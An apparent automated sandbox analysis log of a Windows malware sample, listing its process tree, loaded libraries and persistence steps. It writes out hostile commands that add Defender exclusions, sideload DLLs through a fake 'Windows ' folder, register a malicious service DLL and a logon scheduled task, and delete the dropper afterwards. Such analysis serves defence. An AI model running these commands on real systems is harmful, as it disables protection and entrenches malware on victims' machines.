Source: unknown | Process created: C:\Users\user\Desktop\58VSNPxrI4.exe "C:\Users\user\Desktop\58VSNPxrI4.exe"
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows \System32\printui.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows \System32\printui.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start x939048
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows \System32\printui.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows \System32\printui.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows \System32\printui.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: unknown | Process created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\reg.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\timeout.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\timeout.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows \System32\printui.exe | Section loaded: uxtheme.dll
Source: C:\Windows \System32\printui.exe | Section loaded: printui.dll
Source: C:\Windows \System32\printui.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: libcurl.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: libpq.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: libssl-3-x64.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: libcrypto-3-x64.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: libintl-9.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: libwinpthread-1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: libiconv-2.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: zlib1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exe | Section loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exe | Section loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 58VSNPxrI4.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: 58VSNPxrI4.exe | Static file information: File size 14664704 > 1048576
Source: 58VSNPxrI4.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xdb5c00
Source: 58VSNPxrI4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 58VSNPxrI4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 58VSNPxrI4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 58VSNPxrI4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 58VSNPxrI4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 58VSNPxrI4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 58VSNPxrI4.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848937066.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808546257.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827116011.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2847753443.00007FFBAA01B000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2849098201.00007FFBC31F8000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2849098201.00007FFBC31F8000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848937066.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808546257.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827116011.00007FFBBBD9F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: ucrtbased.pdb source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, ucrtbased.dll.13.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: PrintUI.pdb source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000D.00000000.1687556930.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp, printui.exe, 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: PrintUI.pdbGCTL source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000D.00000000.1687556930.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp, printui.exe, 0000000D.00000002.1759138370.00007FF616B12000.00000002.00000001.01000000.00000005.sdmp
Source: 58VSNPxrI4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 58VSNPxrI4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 58VSNPxrI4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 58VSNPxrI4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 58VSNPxrI4.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FFBBAF9FC30 GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,32_2_00007FFBBAF9FC30
Source: libcurl.dll.13.dr Static PE information: real checksum: 0x0 should be: 0x91802
Source: libssl-3-x64.dll.13.dr Static PE information: real checksum: 0x0 should be: 0xc8e31
Source: console_zero.exe.13.dr Static PE information: real checksum: 0x0 should be: 0xa3db6
Source: libcrypto-3-x64.dll.13.dr Static PE information: real checksum: 0x0 should be: 0x47ab8d
Source: zlib1.dll.13.dr Static PE information: real checksum: 0x0 should be: 0x1636c
Source: libpq.dll.13.dr Static PE information: real checksum: 0x0 should be: 0x597eb
Source: x939048.dat.13.dr Static PE information: real checksum: 0x0 should be: 0x1e9163
Source: x549596.dat.26.dr Static PE information: real checksum: 0x59de4ca should be: 0x72040e
Source: 58VSNPxrI4.exe Static PE information: section name: .fptable
Source: printui.dll.0.dr Static PE information: section name: .fptable
Source: libiconv-2.dll.13.dr Static PE information: section name: .xdata
Source: libiconv-2.dll.13.dr Static PE information: section name: /4
Source: libiconv-2.dll.13.dr Static PE information: section name: /19
Source: libiconv-2.dll.13.dr Static PE information: section name: /31
Source: libiconv-2.dll.13.dr Static PE information: section name: /45
Source: libiconv-2.dll.13.dr Static PE information: section name: /57
Source: libiconv-2.dll.13.dr Static PE information: section name: /70
Source: libiconv-2.dll.13.dr Static PE information: section name: /81
Source: libiconv-2.dll.13.dr Static PE information: section name: /92
Source: libintl-9.dll.13.dr Static PE information: section name: .xdata
Source: libintl-9.dll.13.dr Static PE information: section name: /4
Source: libintl-9.dll.13.dr Static PE information: section name: /19
Source: libintl-9.dll.13.dr Static PE information: section name: /31
Source: libintl-9.dll.13.dr Static PE information: section name: /45
Source: libintl-9.dll.13.dr Static PE information: section name: /57
Source: libintl-9.dll.13.dr Static PE information: section name: /70
Source: libintl-9.dll.13.dr Static PE information: section name: /81
Source: libintl-9.dll.13.dr Static PE information: section name: /92
Source: libwinpthread-1.dll.13.dr Static PE information: section name: .xdata
Source: console_zero.exe.13.dr Static PE information: section name: .fptable
Source: vcruntime140d.dll.13.dr Static PE information: section name: _RDATA
Source: x939048.dat.13.dr Static PE information: section name: .fptable
Source: x549596.dat.26.dr Static PE information: section name: .xdata
Source: C:\Windows\System32\svchost.exe Code function: 26_2_649487B2 push r11; ret 26_2_649487ED
Source: C:\Windows\System32\svchost.exe Code function: 26_2_660224A8 push rax; retf 26_2_660224B1
Source: C:\Windows\System32\svchost.exe Code function: 26_2_660F11DC push rbp; retf 26_2_660F11BF
Source: C:\Windows\System32\svchost.exe Code function: 26_2_660F11DC push rbp; retf 26_2_660F11EF
Source: C:\Windows\System32\svchost.exe Code function: 26_2_660F11E4 push rbp; retf 26_2_660F11BF
Source: C:\Windows\System32\svchost.exe Code function: 26_2_660F11E4 push rbp; retf 26_2_660F11EF
Source: C:\Windows\System32\svchost.exe Code function: 26_2_6829984B push 00000000h; retf 26_2_68299850
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682970AC push rax; iretd 26_2_682970AD
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682951B2 push rdx; retn 0000h 26_2_682951B3
Source: C:\Windows\System32\svchost.exe Code function: 26_2_6829998B push 00000000h; ret 26_2_68299990
Source: C:\Windows\System32\svchost.exe Code function: 26_2_6829999B push 00000000h; iretd 26_2_682999A0
Source: C:\Windows\System32\svchost.exe Code function: 26_2_6829AA73 push 00000000h; ret 26_2_6829AA78
Source: C:\Windows\System32\svchost.exe Code function: 26_2_6829ABBB push 00000000h; retf 26_2_6829ABC0
Source: C:\Windows\System32\svchost.exe Code function: 26_2_6829ABB3 push 00000000h; ret 26_2_6829ABB8
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1428 push rdi; retf 26_2_682A1433
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1420 push rbp; retf 26_2_682A1483
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1430 push rdi; retf 26_2_682A1433
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1468 push rbp; retf 26_2_682A1473
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1460 push rsi; retf 26_2_682A1463
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1470 push rbp; retf 26_2_682A1473
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1440 push rbp; retf 26_2_682A1453
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1458 push rbp; retf 26_2_682A145B
Source: C:\Windows\System32\svchost.exe Code function: 26_2_6828D450 push rbp; retf 26_2_682A14BB
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A14A8 push rbp; retf 26_2_682A1483
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A14A8 push rbp; retf 26_2_682A14BB
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A14B0 push rbp; retf 26_2_682A14BB
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1490 push rbp; retf 26_2_682A149B
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A14E8 push rbp; retf 26_2_682A14EB
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A14E0 push rsp; retf 26_2_682A14E3
Source: C:\Windows\System32\svchost.exe Code function: 26_2_682A1518 push rbp; retf 26_2_682A1523
Source: C:\Windows\System32\svchost.exe Code function: 26_2_6829A7AB push 00000000h; iretd 26_2_6829A7B0

Persistence and Installation Behavior

Source: C:\Windows\System32\reg.exe Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x939048\Parameters ServiceDll C:\Windows\System32\x939048.dat
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows \System32\printui.exe
Source: C:\Users\user\Desktop\58VSNPxrI4.exe File created: C:\Windows \System32\printui.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x939048.dat
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll
